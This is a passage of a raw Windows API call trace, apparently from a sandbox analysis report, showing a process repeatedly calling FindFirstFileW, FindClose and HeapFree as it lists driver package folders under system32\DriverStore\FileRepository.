dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5dc4c8 [0026.014] FindClose (in: hFindFile=0x5dc4c8 | out: hFindFile=0x5dc4c8) returned 1 [0026.014] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5e89b8 | out: hHeap=0x5a0000) returned 1 [0026.014] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\arc.inf_amd64_neutral_11b52dec8e94d9aa\\*", lpFindFileData=0x5e89b8 | out: lpFindFileData=0x5e89b8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x423f9854, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x61ce96b6, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x61ce96b6, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5dc4c8 [0026.014] FindClose (in: hFindFile=0x5dc4c8 | out: hFindFile=0x5dc4c8) returned 1 [0026.014] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5e89b8 | out: hHeap=0x5a0000) returned 1 [0026.014] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\arcsas.inf_amd64_neutral_c763887719bed95d\\*", lpFindFileData=0x5e89b8 | out: lpFindFileData=0x5e89b8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x424b7f36, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x61d0f817, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x61d0f817, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5dc4c8 [0026.015] FindClose (in: hFindFile=0x5dc4c8 | out: hFindFile=0x5dc4c8) returned 1 [0026.015] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5e89b8 | out: hHeap=0x5a0000) returned 1 [0026.015] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\atiilhag.inf_amd64_neutral_0a660e899f5038a2\\*", lpFindFileData=0x5e89b8 | out: lpFindFileData=0x5e89b8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x37d8b42c, ftCreationTime.dwHighDateTime=0x1cb892c, ftLastAccessTime.dwLowDateTime=0x3b8e793a, ftLastAccessTime.dwHighDateTime=0x1cb892c, ftLastWriteTime.dwLowDateTime=0x3b8e793a, ftLastWriteTime.dwHighDateTime=0x1cb892c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5dc4c8 [0026.017] FindClose (in: hFindFile=0x5dc4c8 | out: hFindFile=0x5dc4c8) returned 1 [0026.017] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5e89b8 | out: hHeap=0x5a0000) returned 1 [0026.017] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\atiriol6.inf_amd64_neutral_bde34ad5722cca75\\*", lpFindFileData=0x5ea470 | out: lpFindFileData=0x5ea470*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x459d4a78, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x659c2986, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x659c2986, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5dbe08 [0026.018] FindClose (in: hFindFile=0x5dbe08 | out: hFindFile=0x5dbe08) returned 1 [0026.018] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5ea470 | out: hHeap=0x5a0000) returned 1 [0026.018] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\avc.inf_amd64_neutral_3ef33c750e6308ce\\*", lpFindFileData=0x5ea470 | out: lpFindFileData=0x5ea470*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3ebbd02d, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x60b352f6, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x60b352f6, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5dbe08 [0026.018] FindClose (in: hFindFile=0x5dbe08 | out: hFindFile=0x5dbe08) returned 1 [0026.018] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5ea470 | out: hHeap=0x5a0000) returned 1 [0026.018] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\averfx2hbh826d_noaverir_x64.inf_amd64_neutral_da2ba9e8a30dad14\\*", lpFindFileData=0x5ea470 | out: lpFindFileData=0x5ea470*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x45a6cff9, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x659e8ae7, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x659e8ae7, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5dbe08 [0026.020] FindClose (in: hFindFile=0x5dbe08 | out: hFindFile=0x5dbe08) returned 1 [0026.021] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5ea470 | out: hHeap=0x5a0000) returned 1 [0026.021] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\averfx2hbtv_x64.inf_amd64_neutral_7216b6fb23536c40\\*", lpFindFileData=0x5ea470 | out: lpFindFileData=0x5ea470*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x45b2b6da, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x65a34da7, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x65a34da7, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5dbe08 [0026.022] FindClose (in: hFindFile=0x5dbe08 | out: hFindFile=0x5dbe08) returned 1 [0026.024] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5ea470 | out: hHeap=0x5a0000) returned 1 [0026.027] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\averfx2swtv_noavin_x64.inf_amd64_neutral_86943dd17860e449\\*", lpFindFileData=0x5ea470 | out: lpFindFileData=0x5ea470*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x45c0ff1c, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x65a5af08, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x65a5af08, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5dbe08 [0026.028] FindClose (in: hFindFile=0x5dbe08 | out: hFindFile=0x5dbe08) returned 1 [0026.029] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5ea470 | out: hHeap=0x5a0000) returned 1 [0026.029] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\averfx2swtv_x64.inf_amd64_neutral_24a71cdaabc7f783\\*", lpFindFileData=0x5ea470 | out: lpFindFileData=0x5ea470*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x45d66b7e, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x65aa71c8, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x65aa71c8, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5dbe08 [0026.031] FindClose (in: hFindFile=0x5dbe08 | out: hFindFile=0x5dbe08) returned 1 [0026.031] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5ea470 | out: hHeap=0x5a0000) returned 1 [0026.031] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\averhbh826_noaverir_x64.inf_amd64_neutral_2fe3b14136d6e46d\\*", lpFindFileData=0x5ea470 | out: lpFindFileData=0x5ea470*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x45e25260, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x65acd328, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x65acd328, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5dbe08 [0026.033] FindClose (in: hFindFile=0x5dbe08 | out: hFindFile=0x5dbe08) returned 1 [0026.034] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5ea470 | out: hHeap=0x5a0000) returned 1 [0026.034] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\avmx64c.inf_amd64_neutral_8ebb15bf548db022\\*", lpFindFileData=0x5ea470 | out: lpFindFileData=0x5ea470*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x398df1b4, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x5f66124f, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x5f66124f, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5dbe08 [0026.035] FindClose (in: hFindFile=0x5dbe08 | out: hFindFile=0x5dbe08) returned 1 [0026.036] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5ea470 | out: hHeap=0x5a0000) returned 1 [0026.036] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\battery.inf_amd64_neutral_cb8fa151a7b7cb80\\*", lpFindFileData=0x5ea470 | out: lpFindFileData=0x5ea470*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x43d90504, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x6215ffff, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x6215ffff, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5dbe08 [0026.038] FindClose (in: hFindFile=0x5dbe08 | out: hFindFile=0x5dbe08) returned 1 [0026.039] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5ea470 | out: hHeap=0x5a0000) returned 1 [0026.039] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\bda.inf_amd64_neutral_41c6262952846788\\*", lpFindFileData=0x5ea470 | out: lpFindFileData=0x5ea470*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3d9bc9ac, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x607c934f, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x607c934f, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5dbe08 [0026.040] FindClose (in: hFindFile=0x5dbe08 | out: hFindFile=0x5dbe08) returned 1 [0026.040] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5ea470 | out: hHeap=0x5a0000) returned 1 [0026.040] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\blbdrive.inf_amd64_neutral_1aa816fe7dc98c3f\\*", lpFindFileData=0x5ea470 | out: lpFindFileData=0x5ea470*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x43bc7480, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x62139e9e, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x62139e9e, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5dbe08 [0026.040] FindClose (in: hFindFile=0x5dbe08 | out: hFindFile=0x5dbe08) returned 1 [0026.040] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5ea470 | out: hHeap=0x5a0000) returned 1 [0026.040] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\brmfcmdm.inf_amd64_neutral_af49d2f3ffa12116\\*", lpFindFileData=0x5ea470 | out: lpFindFileData=0x5ea470*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x50dd8b83, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x6c4482cb, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x6c4482cb, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5dbe08 [0026.042] FindClose (in: hFindFile=0x5dbe08 | out: hFindFile=0x5dbe08) returned 1 [0026.043] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5ea470 | out: hHeap=0x5a0000) returned 1 [0026.043] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\brmfcmf.inf_amd64_neutral_67b5984f8e8ff717\\*", lpFindFileData=0x5ea470 | out: lpFindFileData=0x5ea470*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3af09ebd, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x5ffc0901, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x5ffc0901, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5dbe08 [0026.044] FindClose (in: hFindFile=0x5dbe08 | out: hFindFile=0x5dbe08) returned 1 [0026.045] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5ea470 | out: hHeap=0x5a0000) returned 1 [0026.045] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\brmfcsto.inf_amd64_neutral_2d7208355536945e\\*", lpFindFileData=0x5ea470 | out: lpFindFileData=0x5ea470*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x40742ec0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x612333a3, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x612333a3, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5dbe08 [0026.046] FindClose (in: hFindFile=0x5dbe08 | out: hFindFile=0x5dbe08) returned 1 [0026.046] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5ea470 | out: hHeap=0x5a0000) returned 1 [0026.046] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\brmfcumd.inf_amd64_neutral_db43b26810939b3e\\*", lpFindFileData=0x5ea470 | out: lpFindFileData=0x5ea470*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x407db441, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x61259503, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x61259503, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5dbe08 [0026.046] FindClose (in: hFindFile=0x5dbe08 | out: hFindFile=0x5dbe08) returned 1 [0026.046] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5ea470 | out: hHeap=0x5a0000) returned 1 [0026.046] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\brmfcwia.inf_amd64_neutral_817b8835aed3d6b7\\*", lpFindFileData=0x5ea470 | out: lpFindFileData=0x5ea470*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3b145361, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x60058e82, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x60058e82, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5dbe08 [0026.049] FindClose (in: hFindFile=0x5dbe08 | out: hFindFile=0x5dbe08) returned 1 [0026.050] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5ea470 | out: hHeap=0x5a0000) returned 1 [0026.050] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\brmfport.inf_amd64_neutral_f41f35e5c21bc350\\*", lpFindFileData=0x5ea470 | out: lpFindFileData=0x5ea470*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3b2e8284, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x6013d6c3, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x6013d6c3, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5dbe08 [0026.051] FindClose (in: hFindFile=0x5dbe08 | out: hFindFile=0x5dbe08) returned 1 [0026.052] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5ea470 | out: hHeap=0x5a0000) returned 1 [0026.052] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\bth.inf_amd64_neutral_e54666f6a3e5af91\\*", lpFindFileData=0x5ea470 | out: lpFindFileData=0x5ea470*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x38143693, ftCreationTime.dwHighDateTime=0x1cb892c, ftLastAccessTime.dwLowDateTime=0x3ba3e59c, ftLastAccessTime.dwHighDateTime=0x1cb892c, ftLastWriteTime.dwLowDateTime=0x3ba3e59c, ftLastWriteTime.dwHighDateTime=0x1cb892c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5dbe08 [0026.054] FindClose (in: hFindFile=0x5dbe08 | out: hFindFile=0x5dbe08) returned 1 [0026.054] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5ea470 | out: hHeap=0x5a0000) returned 1 [0026.054] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\bthmtpenum.inf_amd64_neutral_c70e85b87ee4ece9\\*", lpFindFileData=0x5ea470 | out: lpFindFileData=0x5ea470*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5bd8c4a7, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x6d374f27, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x6d374f27, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5dbe08 [0026.055] FindClose (in: hFindFile=0x5dbe08 | out: hFindFile=0x5dbe08) returned 1 [0026.055] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5ea470 | out: hHeap=0x5a0000) returned 1 [0026.055] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\bthpan.inf_amd64_neutral_024281c0e4e954e2\\*", lpFindFileData=0x5ea470 | out: lpFindFileData=0x5ea470*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3d29879f, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x606e4b0e, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x606e4b0e, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5dbe08 [0026.055] FindClose (in: hFindFile=0x5dbe08 | out: hFindFile=0x5dbe08) returned 1 [0026.055] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5ea470 | out: hHeap=0x5a0000) returned 1 [0026.055] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\bthprint.inf_amd64_neutral_3c11362fa327f5a4\\*", lpFindFileData=0x5ea470 | out: lpFindFileData=0x5ea470*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3d92442b, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x607c934f, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x607c934f, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5dbe08 [0026.056] FindClose (in: hFindFile=0x5dbe08 | out: hFindFile=0x5dbe08) returned 1 [0026.056] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5ea470 | out: hHeap=0x5a0000) returned 1 [0026.056] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\bthspp.inf_amd64_neutral_1b15060bdfbd09e1\\*", lpFindFileData=0x5ea470 | out: lpFindFileData=0x5ea470*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3d7f3928, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x607a31ef, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x607a31ef, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5dbe08 [0026.056] FindClose (in: hFindFile=0x5dbe08 | out: hFindFile=0x5dbe08) returned 1 [0026.056] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5ea470 | out: hHeap=0x5a0000) returned 1 [0026.056] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\cdrom.inf_amd64_neutral_0b3d0d1942ab684b\\*", lpFindFileData=0x5ea470 | out: lpFindFileData=0x5ea470*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x39a67f22, ftCreationTime.dwHighDateTime=0x1cb892c, ftLastAccessTime.dwLowDateTime=0x3c1164e9, ftLastAccessTime.dwHighDateTime=0x1cb892c, ftLastWriteTime.dwLowDateTime=0x3c1164e9, ftLastWriteTime.dwHighDateTime=0x1cb892c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5dbe08 [0026.057] FindClose (in: hFindFile=0x5dbe08 | out: hFindFile=0x5dbe08) returned 1 [0026.057] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5ea470 | out: hHeap=0x5a0000) returned 1 [0026.057] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\circlass.inf_amd64_neutral_cf52485bed804e02\\*", lpFindFileData=0x5ea470 | out: lpFindFileData=0x5ea470*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3d546063, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x60756f2f, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x60756f2f, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5dbe08 [0026.057] FindClose (in: hFindFile=0x5dbe08 | out: hFindFile=0x5dbe08) returned 1 [0026.057] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5ea470 | out: hHeap=0x5a0000) returned 1 [0026.057] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\compositebus.inf_amd64_neutral_b9280780a8000d4b\\*", lpFindFileData=0x5ea470 | out: lpFindFileData=0x5ea470*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3766721f, ftCreationTime.dwHighDateTime=0x1cb892c, ftLastAccessTime.dwLowDateTime=0x3b686335, ftLastAccessTime.dwHighDateTime=0x1cb892c, ftLastWriteTime.dwLowDateTime=0x3b686335, ftLastWriteTime.dwHighDateTime=0x1cb892c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5dbe08 [0026.058] FindClose (in: hFindFile=0x5dbe08 | out: hFindFile=0x5dbe08) returned 1 [0026.058] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5ea470 | out: hHeap=0x5a0000) returned 1 [0026.058] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\cpu.inf_amd64_neutral_ae5de2e1bf2793c3\\*", lpFindFileData=0x5ea470 | out: lpFindFileData=0x5ea470*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x42df1487, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x61f4acbb, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x61f4acbb, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5dbe08 [0026.059] FindClose (in: hFindFile=0x5dbe08 | out: hFindFile=0x5dbe08) returned 1 [0026.059] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5ea470 | out: hHeap=0x5a0000) returned 1 [0026.063] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\crcdisk.inf_amd64_neutral_d10626d1f8b423c3\\*", lpFindFileData=0x5ea470 | out: lpFindFileData=0x5ea470*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3dd4eab2, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x60815610, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x60815610, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5dbe08 [0026.064] FindClose (in: hFindFile=0x5dbe08 | out: hFindFile=0x5dbe08) returned 1 [0026.064] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5ea470 | out: hHeap=0x5a0000) returned 1 [0026.064] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\cxfalcon_ibv64.inf_amd64_neutral_d065aec3fcf4ec4e\\*", lpFindFileData=0x5ea470 | out: 